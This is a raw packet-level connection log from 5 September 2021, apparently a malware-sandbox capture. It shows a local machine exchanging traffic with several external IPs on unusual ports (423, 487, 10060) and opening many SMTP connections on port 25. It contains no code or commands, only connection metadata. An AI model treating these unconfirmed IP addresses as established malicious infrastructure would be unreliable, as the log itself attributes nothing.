Sep 5, 2021 15:50:12.060781956 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060834885 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060847044 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.060885906 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060934067 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.060937881 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060991049 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061037064 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.061042070 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061100960 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061156034 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.061156034 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061207056 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061254978 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.061259031 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061321974 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061371088 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061372042 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.061424017 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061475992 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.061475992 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061527967 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061580896 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061631918 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061651945 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.061691046 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061717987 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.061744928 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061793089 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.061795950 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061846972 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061892986 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.061897039 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061937094 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061990976 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.061994076 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.062038898 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062091112 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.062099934 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062151909 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062199116 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.062203884 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062254906 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062304974 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.062308073 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062359095 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062407970 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.062412024 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062460899 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062510014 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.062519073 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062572956 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062623978 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062635899 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.062675953 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062726974 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062727928 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.062774897 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062828064 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.062829971 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062880993 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.062939882 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.064218998 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.064266920 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.064306021 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.064322948 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.064342976 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.064390898 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.069145918 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.071715117 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.089870930 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.089915991 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.089977026 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.090007067 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.134027004 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134088039 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134124994 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134157896 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134192944 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134213924 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.134232044 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134267092 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134299994 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134331942 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.134334087 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134367943 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134401083 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134401083 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.134433985 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134459019 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.134468079 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134510994 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134525061 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.134546041 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134578943 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134612083 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134629965 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.134644985 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.134725094 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.134814024 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.159415007 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.159488916 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.159548044 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.159554005 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.159595966 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.159610987 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.159615993 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.159672022 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.204025984 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.204109907 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.204133034 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.204171896 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.204200029 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.204232931 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.204240084 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.204293013 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.204334974 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.204356909 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.204380989 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.204420090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.204426050 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.204479933 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.204540014 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.204575062 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.334296942 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.403626919 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.650029898 CEST	49724	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:12.650448084 CEST	49725	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:12.650847912 CEST	49726	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:12.651252985 CEST	49727	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:12.670253038 CEST	49728	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:12.672173977 CEST	49729	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:12.691550970 CEST	423	49727	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:12.691653967 CEST	49727	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:12.696706057 CEST	423	49728	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:12.696824074 CEST	49728	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:12.703836918 CEST	423	49729	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:12.703954935 CEST	49729	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:12.718167067 CEST	423	49725	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:12.718313932 CEST	49725	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:12.719487906 CEST	423	49726	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:12.719721079 CEST	49726	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:12.722479105 CEST	423	49728	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:12.722912073 CEST	49728	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:12.725872040 CEST	423	49724	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:12.726685047 CEST	49724	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:12.732043982 CEST	423	49727	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:12.733102083 CEST	49727	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:12.734746933 CEST	423	49729	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:12.735001087 CEST	49729	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:12.748296022 CEST	423	49728	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:12.749145031 CEST	423	49728	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:12.768197060 CEST	423	49729	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:12.768367052 CEST	423	49729	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:12.775065899 CEST	423	49727	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:12.775715113 CEST	423	49727	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:12.786341906 CEST	423	49725	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:12.788841009 CEST	423	49726	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:12.803092003 CEST	423	49724	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:12.803236961 CEST	49728	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:12.818846941 CEST	49729	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:12.820535898 CEST	49731	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:12.825109005 CEST	49732	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:12.834397078 CEST	49726	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:12.834460020 CEST	49727	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:12.834477901 CEST	49725	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:12.850065947 CEST	49724	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:12.852075100 CEST	80	49732	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:12.852224112 CEST	49732	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:12.969187975 CEST	25	49731	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:12.969425917 CEST	49731	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:13.013051987 CEST	49733	25	192.168.2.4	195.4.92.218
Sep 5, 2021 15:50:13.016241074 CEST	49734	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.037395000 CEST	25	49733	195.4.92.218	192.168.2.4
Sep 5, 2021 15:50:13.037508965 CEST	49733	25	192.168.2.4	195.4.92.218
Sep 5, 2021 15:50:13.044147015 CEST	80	49734	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.044229984 CEST	49734	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.063477039 CEST	49735	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:13.071644068 CEST	49736	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.071908951 CEST	49725	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:13.072212934 CEST	49726	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:13.072463036 CEST	49724	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:13.072717905 CEST	49732	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.072808981 CEST	49734	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.090694904 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.090876102 CEST	49735	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:13.096615076 CEST	80	49736	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.096710920 CEST	49736	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.096740007 CEST	49736	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.098133087 CEST	80	49732	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.100156069 CEST	25	49733	195.4.92.218	192.168.2.4
Sep 5, 2021 15:50:13.100509882 CEST	25	49733	195.4.92.218	192.168.2.4
Sep 5, 2021 15:50:13.101336956 CEST	80	49734	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.101500988 CEST	49733	25	192.168.2.4	195.4.92.218
Sep 5, 2021 15:50:13.115626097 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:13.120361090 CEST	49733	25	192.168.2.4	195.4.92.218
Sep 5, 2021 15:50:13.121692896 CEST	80	49736	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.136038065 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.139065981 CEST	49738	25	192.168.2.4	104.47.8.33
Sep 5, 2021 15:50:13.139816999 CEST	423	49725	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:13.140379906 CEST	423	49725	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:13.140568972 CEST	25	49733	195.4.92.218	192.168.2.4
Sep 5, 2021 15:50:13.140969038 CEST	423	49726	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:13.141465902 CEST	423	49726	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:13.149354935 CEST	423	49724	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:13.150048018 CEST	423	49724	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:13.160511017 CEST	80	49732	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.160547972 CEST	80	49732	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.160577059 CEST	80	49732	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.160625935 CEST	49732	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.161026955 CEST	80	49734	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.161079884 CEST	80	49734	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.161106110 CEST	80	49734	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.161148071 CEST	49734	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.164781094 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.165524006 CEST	25	49738	104.47.8.33	192.168.2.4
Sep 5, 2021 15:50:13.167608976 CEST	49738	25	192.168.2.4	104.47.8.33
Sep 5, 2021 15:50:13.168771029 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:13.170753956 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:13.172564983 CEST	49740	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.178253889 CEST	49735	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:13.181073904 CEST	80	49736	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.181116104 CEST	80	49736	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.181143999 CEST	80	49736	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.181209087 CEST	49736	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.193844080 CEST	49726	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:13.193846941 CEST	49725	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:13.193881989 CEST	49724	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:13.195727110 CEST	49735	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:13.195980072 CEST	25	49738	104.47.8.33	192.168.2.4
Sep 5, 2021 15:50:13.200222969 CEST	80	49740	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.201595068 CEST	49740	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.209443092 CEST	49732	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.209697962 CEST	49734	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.209750891 CEST	49738	25	192.168.2.4	104.47.8.33
Sep 5, 2021 15:50:13.222882032 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.225207090 CEST	49736	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.227583885 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.234414101 CEST	49741	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:13.236128092 CEST	25	49738	104.47.8.33	192.168.2.4
Sep 5, 2021 15:50:13.237097979 CEST	25	49738	104.47.8.33	192.168.2.4
Sep 5, 2021 15:50:13.241117954 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.241259098 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.242459059 CEST	49735	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:13.246759892 CEST	49742	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.257313967 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:13.258080959 CEST	25	49741	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:13.258188009 CEST	49741	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:13.265928984 CEST	25	49731	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:13.265978098 CEST	25	49731	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:13.266043901 CEST	49731	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:13.269913912 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.271339893 CEST	80	49742	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.271576881 CEST	49742	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.274696112 CEST	49738	25	192.168.2.4	104.47.8.33
Sep 5, 2021 15:50:13.280237913 CEST	25	49741	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:13.280339003 CEST	25	49741	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:13.280386925 CEST	49741	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:13.299742937 CEST	49735	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:13.302485943 CEST	25	49738	104.47.8.33	192.168.2.4
Sep 5, 2021 15:50:13.302665949 CEST	49731	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:13.303179026 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:13.304430008 CEST	25	49738	104.47.8.33	192.168.2.4
Sep 5, 2021 15:50:13.304866076 CEST	25	49738	104.47.8.33	192.168.2.4
Sep 5, 2021 15:50:13.307574987 CEST	49738	25	192.168.2.4	104.47.8.33
Sep 5, 2021 15:50:13.310340881 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:13.322860956 CEST	49738	25	192.168.2.4	104.47.8.33
Sep 5, 2021 15:50:13.324074984 CEST	49741	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:13.333519936 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.347635031 CEST	25	49741	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:13.350795984 CEST	25	49738	104.47.8.33	192.168.2.4
Sep 5, 2021 15:50:13.357743025 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.365135908 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:13.368305922 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:13.412671089 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.412828922 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:13.450695992 CEST	25	49731	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:13.516450882 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.516567945 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:13.570321083 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:13.592902899 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.615729094 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:13.618838072 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.662647963 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.762700081 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.763339043 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.774169922 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:13.797875881 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.808831930 CEST	49743	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:13.809503078 CEST	49744	10060	192.168.2.4	213.91.128.133
Sep 5, 2021 15:50:13.825670004 CEST	49735	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:13.831007957 CEST	25	49743	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:13.831593990 CEST	49743	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:13.832446098 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:13.839482069 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.840150118 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.852364063 CEST	49745	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:13.852941990 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.853269100 CEST	49746	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.853420973 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.853452921 CEST	25	49743	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:13.853660107 CEST	25	49743	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:13.855576038 CEST	49743	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:13.856235027 CEST	49728	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:13.857242107 CEST	49727	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:13.863533974 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.866497040 CEST	10060	49744	213.91.128.133	192.168.2.4
Sep 5, 2021 15:50:13.866602898 CEST	49744	10060	192.168.2.4	213.91.128.133
Sep 5, 2021 15:50:13.871407986 CEST	49744	10060	192.168.2.4	213.91.128.133
Sep 5, 2021 15:50:13.871993065 CEST	49743	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:13.876321077 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.876570940 CEST	49729	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:13.876667023 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.876957893 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.877247095 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.877367020 CEST	49740	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.877701044 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.877779007 CEST	49742	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.877911091 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.878097057 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.878338099 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.878535986 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:13.881105900 CEST	80	49746	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.881568909 CEST	423	49728	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:13.881666899 CEST	49746	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.881829977 CEST	49746	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.881887913 CEST	423	49728	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:13.882653952 CEST	49732	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.884676933 CEST	49735	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:13.894125938 CEST	25	49743	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:13.898108959 CEST	423	49727	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:13.901487112 CEST	423	49727	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:13.902179003 CEST	80	49742	172.217.168.68	192.168.2.4
